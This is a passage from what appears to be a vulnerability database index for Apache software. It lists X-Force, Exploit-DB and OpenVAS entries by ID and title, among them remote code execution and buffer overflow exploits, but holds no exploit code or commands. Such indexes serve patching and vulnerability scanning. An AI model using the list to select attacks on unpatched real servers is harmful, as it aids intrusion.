15305| [23612] Apache mod_imap referer field cross-site scripting
15306| [23173] Apache Struts error message cross-site scripting
15307| [22942] Apache Tomcat directory listing denial of service
15308| [22858] Apache Multi-Processing Module code allows denial of service
15309| [22602] RHSA-2005:582 updates for Apache httpd not installed
15310| [22520] Apache mod-auth-shadow "
15311| [22466] ApacheTop symlink
15312| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
15313| [22006] Apache HTTP Server byte-range filter denial of service
15314| [21567] Apache mod_ssl off-by-one buffer overflow
15315| [21195] Apache HTTP Server header HTTP request smuggling
15316| [20383] Apache HTTP Server htdigest buffer overflow
15317| [19681] Apache Tomcat AJP12 request denial of service
15318| [18993] Apache HTTP server check_forensic symlink attack
15319| [18790] Apache Tomcat Manager cross-site scripting
15320| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
15321| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
15322| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
15323| [17961] Apache Web server ServerTokens has not been set
15324| [17930] Apache HTTP Server HTTP GET request denial of service
15325| [17785] Apache mod_include module buffer overflow
15326| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
15327| [17473] Apache HTTP Server Satisfy directive allows access to resources
15328| [17413] Apache htpasswd buffer overflow
15329| [17384] Apache HTTP Server environment variable configuration file buffer overflow
15330| [17382] Apache HTTP Server IPv6 apr_util denial of service
15331| [17366] Apache HTTP Server mod_dav module LOCK denial of service
15332| [17273] Apache HTTP Server speculative mode denial of service
15333| [17200] Apache HTTP Server mod_ssl denial of service
15334| [16890] Apache HTTP Server server-info request has been detected
15335| [16889] Apache HTTP Server server-status request has been detected
15336| [16705] Apache mod_ssl format string attack
15337| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
15338| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
15339| [16230] Apache HTTP Server PHP denial of service
15340| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
15341| [15958] Apache HTTP Server authentication modules memory corruption
15342| [15547] Apache HTTP Server mod_disk_cache local information disclosure
15343| [15540] Apache HTTP Server socket starvation denial of service
15344| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
15345| [15422] Apache HTTP Server mod_access information disclosure
15346| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
15347| [15293] Apache for Cygwin "
15348| [15065] Apache-SSL has a default password
15349| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
15350| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
15351| [14751] Apache Mod_python output filter information disclosure
15352| [14125] Apache HTTP Server mod_userdir module information disclosure
15353| [14075] Apache HTTP Server mod_php file descriptor leak
15354| [13703] Apache HTTP Server account
15355| [13689] Apache HTTP Server configuration allows symlinks
15356| [13688] Apache HTTP Server configuration allows SSI
15357| [13687] Apache HTTP Server Server: header value
15358| [13685] Apache HTTP Server ServerTokens value
15359| [13684] Apache HTTP Server ServerSignature value
15360| [13672] Apache HTTP Server config allows directory autoindexing
15361| [13671] Apache HTTP Server default content
15362| [13670] Apache HTTP Server config file directive references outside content root
15363| [13668] Apache HTTP Server httpd not running in chroot environment
15364| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
15365| [13664] Apache HTTP Server config file contains ScriptAlias entry
15366| [13663] Apache HTTP Server CGI support modules loaded
15367| [13661] Apache HTTP Server config file contains AddHandler entry
15368| [13660] Apache HTTP Server 500 error page not CGI script
15369| [13659] Apache HTTP Server 413 error page not CGI script
15370| [13658] Apache HTTP Server 403 error page not CGI script
15371| [13657] Apache HTTP Server 401 error page not CGI script
15372| [13552] Apache HTTP Server mod_cgid module information disclosure
15373| [13550] Apache GET request directory traversal
15374| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
15375| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
15376| [13429] Apache Tomcat non-HTTP request denial of service
15377| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
15378| [13295] Apache weak password encryption
15379| [13254] Apache Tomcat .jsp cross-site scripting
15380| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
15381| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
15382| [12681] Apache HTTP Server mod_proxy could allow mail relaying
15383| [12662] Apache HTTP Server rotatelogs denial of service
15384| [12554] Apache Tomcat stores password in plain text
15385| [12553] Apache HTTP Server redirects and subrequests denial of service
15386| [12552] Apache HTTP Server FTP proxy server denial of service
15387| [12551] Apache HTTP Server prefork MPM denial of service
15388| [12550] Apache HTTP Server weaker than expected encryption
15389| [12549] Apache HTTP Server type-map file denial of service
15390| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
15391| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
15392| [12091] Apache HTTP Server apr_password_validate denial of service
15393| [12090] Apache HTTP Server apr_psprintf code execution
15394| [11804] Apache HTTP Server mod_access_referer denial of service
15395| [11750] Apache HTTP Server could leak sensitive file descriptors
15396| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
15397| [11703] Apache long slash path allows directory listing
15398| [11695] Apache HTTP Server LF (Line Feed) denial of service
15399| [11694] Apache HTTP Server filestat.c denial of service
15400| [11438] Apache HTTP Server MIME message boundaries information disclosure
15401| [11412] Apache HTTP Server error log terminal escape sequence injection
15402| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
15403| [11195] Apache Tomcat web.xml could be used to read files
15404| [11194] Apache Tomcat URL appended with a null character could list directories
15405| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
15406| [11126] Apache HTTP Server illegal character file disclosure
15407| [11125] Apache HTTP Server DOS device name HTTP POST code execution
15408| [11124] Apache HTTP Server DOS device name denial of service
15409| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
15410| [10938] Apache HTTP Server printenv test CGI cross-site scripting
15411| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
15412| [10575] Apache mod_php module could allow an attacker to take over the httpd process
15413| [10499] Apache HTTP Server WebDAV HTTP POST view source
15414| [10457] Apache HTTP Server mod_ssl "
15415| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
15416| [10414] Apache HTTP Server htdigest multiple buffer overflows
15417| [10413] Apache HTTP Server htdigest temporary file race condition
15418| [10412] Apache HTTP Server htpasswd temporary file race condition
15419| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
15420| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
15421| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
15422| [10280] Apache HTTP Server shared memory scorecard overwrite
15423| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
15424| [10241] Apache HTTP Server Host: header cross-site scripting
15425| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
15426| [10208] Apache HTTP Server mod_dav denial of service
15427| [10206] HP VVOS Apache mod_ssl denial of service
15428| [10200] Apache HTTP Server stderr denial of service
15429| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
15430| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
15431| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
15432| [10098] Slapper worm targets OpenSSL/Apache systems
15433| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
15434| [9875] Apache HTTP Server .var file request could disclose installation path
15435| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
15436| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
15437| [9623] Apache HTTP Server ap_log_rerror() path disclosure
15438| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
15439| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
15440| [9396] Apache Tomcat null character to threads denial of service
15441| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
15442| [9249] Apache HTTP Server chunked encoding heap buffer overflow
15443| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
15444| [8932] Apache Tomcat example class information disclosure
15445| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
15446| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
15447| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
15448| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
15449| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
15450| [8400] Apache HTTP Server mod_frontpage buffer overflows
15451| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
15452| [8308] Apache "
15453| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
15454| [8119] Apache and PHP OPTIONS request reveals "
15455| [8054] Apache is running on the system
15456| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
15457| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
15458| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
15459| [7836] Apache HTTP Server log directory denial of service
15460| [7815] Apache for Windows "
15461| [7810] Apache HTTP request could result in unexpected behavior
15462| [7599] Apache Tomcat reveals installation path
15463| [7494] Apache "
15464| [7419] Apache Web Server could allow remote attackers to overwrite .log files
15465| [7363] Apache Web Server hidden HTTP requests
15466| [7249] Apache mod_proxy denial of service
15467| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
15468| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
15469| [7059] Apache "
15470| [7057] Apache "
15471| [7056] Apache "
15472| [7055] Apache "
15473| [7054] Apache "
15474| [6997] Apache Jakarta Tomcat error message may reveal information
15475| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
15476| [6970] Apache crafted HTTP request could reveal the internal IP address
15477| [6921] Apache long slash path allows directory listing
15478| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
15479| [6527] Apache Web Server for Windows and OS2 denial of service
15480| [6316] Apache Jakarta Tomcat may reveal JSP source code
15481| [6305] Apache Jakarta Tomcat directory traversal
15482| [5926] Linux Apache symbolic link
15483| [5659] Apache Web server discloses files when used with php script
15484| [5310] Apache mod_rewrite allows attacker to view arbitrary files
15485| [5204] Apache WebDAV directory listings
15486| [5197] Apache Web server reveals CGI script source code
15487| [5160] Apache Jakarta Tomcat default installation
15488| [5099] Trustix Secure Linux installs Apache with world writable access
15489| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
15490| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
15491| [4931] Apache source.asp example file allows users to write to files
15492| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
15493| [4205] Apache Jakarta Tomcat delivers file contents
15494| [2084] Apache on Debian by default serves the /usr/doc directory
15495| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
15496| [697] Apache HTTP server beck exploit
15497| [331] Apache cookies buffer overflow
15498|
15499| Exploit-DB - https://www.exploit-db.com:
15500| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
15501| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
15502| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
15503| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
15504| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
15505| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
15506| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
15507| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
15508| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
15509| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
15510| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
15511| [29859] Apache Roller OGNL Injection
15512| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
15513| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
15514| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
15515| [29290] Apache / PHP 5.x Remote Code Execution Exploit
15516| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
15517| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
15518| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
15519| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
15520| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
15521| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
15522| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
15523| [27096] Apache Geronimo 1.0 Error Page XSS
15524| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
15525| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
15526| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
15527| [25986] Plesk Apache Zeroday Remote Exploit
15528| [25980] Apache Struts includeParams Remote Code Execution
15529| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
15530| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
15531| [24874] Apache Struts ParametersInterceptor Remote Code Execution
15532| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
15533| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
15534| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
15535| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
15536| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
15537| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
15538| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
15539| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
15540| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
15541| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
15542| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
15543| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
15544| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
15545| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
15546| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
15547| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
15548| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
15549| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
15550| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
15551| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
15552| [21719] Apache 2.0 Path Disclosure Vulnerability
15553| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
15554| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
15555| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
15556| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
15557| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
15558| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
15559| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
15560| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
15561| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
15562| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
15563| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
15564| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
15565| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
15566| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
15567| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
15568| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
15569| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
15570| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
15571| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
15572| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
15573| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
15574| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
15575| [20558] Apache 1.2 Web Server DoS Vulnerability
15576| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
15577| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
15578| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
15579| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
15580| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
15581| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
15582| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
15583| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
15584| [19231] PHP apache_request_headers Function Buffer Overflow
15585| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
15586| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
15587| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
15588| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
15589| [18442] Apache httpOnly Cookie Disclosure
15590| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
15591| [18221] Apache HTTP Server Denial of Service
15592| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
15593| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
15594| [17691] Apache Struts < 2.2.0 - Remote Command Execution
15595| [16798] Apache mod_jk 1.2.20 Buffer Overflow
15596| [16782] Apache Win32 Chunked Encoding
15597| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
15598| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
15599| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
15600| [15319] Apache 2.2 (Windows) Local Denial of Service
15601| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
15602| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
15603| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
15604| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
15605| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
15606| [12330] Apache OFBiz - Multiple XSS
15607| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
15608| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
15609| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
15610| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
15611| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
15612| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
15613| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
15614| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
15615| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
15616| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
15617| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
15618| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
15619| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
15620| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
15621| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
15622| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
15623| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
15624| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
15625| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
15626| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
15627| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
15628| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
15629| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
15630| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
15631| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
15632| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
15633| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
15634| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
15635| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
15636| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
15637| [466] htpasswd Apache 1.3.31 - Local Exploit
15638| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
15639| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
15640| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
15641| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
15642| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
15643| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
15644| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
15645| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
15646| [9] Apache HTTP Server 2.x Memory Leak Exploit
15647|
15648| OpenVAS (Nessus) - http://www.openvas.org:
15649| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
15650| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
15651| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
15652| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
15653| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
15654| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
15655| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
15656| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
15657| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
15658| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
15659| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
15660| [900571] Apache APR-Utils Version Detection
15661| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
15662| [900496] Apache Tiles Multiple XSS Vulnerability
15663| [900493] Apache Tiles Version Detection
15664| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
15665| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
15666| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
15667| [870175] RedHat Update for apache RHSA-2008:0004-01
15668| [864591] Fedora Update for apache-poi FEDORA-2012-10835
15669| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
15670| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
15671| [864250] Fedora Update for apache-poi FEDORA-2012-7683
15672| [864249] Fedora Update for apache-poi FEDORA-2012-7686
15673| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
15674| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
15675| [855821] Solaris Update for Apache 1.3 122912-19
15676| [855812] Solaris Update for Apache 1.3 122911-19
15677| [855737] Solaris Update for Apache 1.3 122911-17
15678| [855731] Solaris Update for Apache 1.3 122912-17
15679| [855695] Solaris Update for Apache 1.3 122911-16
15680| [855645] Solaris Update for Apache 1.3 122912-16
15681| [855587] Solaris Update for kernel update and Apache 108529-29
15682| [855566] Solaris Update for Apache 116973-07
15683| [855531] Solaris Update for Apache 116974-07
15684| [855524] Solaris Update for Apache 2 120544-14
15685| [855494] Solaris Update for Apache 1.3 122911-15
15686| [855478] Solaris Update for Apache Security 114145-11
15687| [855472] Solaris Update for Apache Security 113146-12
15688| [855179] Solaris Update for Apache 1.3 122912-15
15689| [855147] Solaris Update for kernel update and Apache 108528-29
15690| [855077] Solaris Update for Apache 2 120543-14
15691| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
15692| [850088] SuSE Update for apache2 SUSE-SA:2007:061
15693| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
15694| [841209] Ubuntu Update for apache2 USN-1627-1
15695| [840900] Ubuntu Update for apache2 USN-1368-1
15696| [840798] Ubuntu Update for apache2 USN-1259-1
15697| [840734] Ubuntu Update for apache2 USN-1199-1
15698| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
15699| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
15700| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
15701| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
15702| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
15703| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
15704| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
15705| [835253] HP-UX Update for Apache Web Server HPSBUX02645
15706| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
15707| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
15708| [835236] HP-UX Update for Apache with PHP HPSBUX02543
15709| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
15710| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
15711| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
15712| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
15713| [835188] HP-UX Update for Apache HPSBUX02308
15714| [835181] HP-UX Update for Apache With PHP HPSBUX02332
15715| [835180] HP-UX Update for Apache with PHP HPSBUX02342
15716| [835172] HP-UX Update for Apache HPSBUX02365
15717| [835168] HP-UX Update for Apache HPSBUX02313
15718| [835148] HP-UX Update for Apache HPSBUX01064
15719| [835139] HP-UX Update for Apache with PHP HPSBUX01090
15720| [835131] HP-UX Update for Apache HPSBUX00256
15721| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
15722| [835104] HP-UX Update for Apache HPSBUX00224
15723| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
15724| [835101] HP-UX Update for Apache HPSBUX01232
15725| [835080] HP-UX Update for Apache HPSBUX02273
15726| [835078] HP-UX Update for ApacheStrong HPSBUX00255
15727| [835044] HP-UX Update for Apache HPSBUX01019
15728| [835040] HP-UX Update for Apache PHP HPSBUX00207
15729| [835025] HP-UX Update for Apache HPSBUX00197
15730| [835023] HP-UX Update for Apache HPSBUX01022
15731| [835022] HP-UX Update for Apache HPSBUX02292
15732| [835005] HP-UX Update for Apache HPSBUX02262
15733| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
15734| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
15735| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
15736| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
15737| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
15738| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
15739| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
15740| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
15741| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
15742| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
15743| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
15744| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
15745| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
15746| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
15747| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
15748| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
15749| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
15750| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
15751| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
15752| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
15753| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
15754| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
15755| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
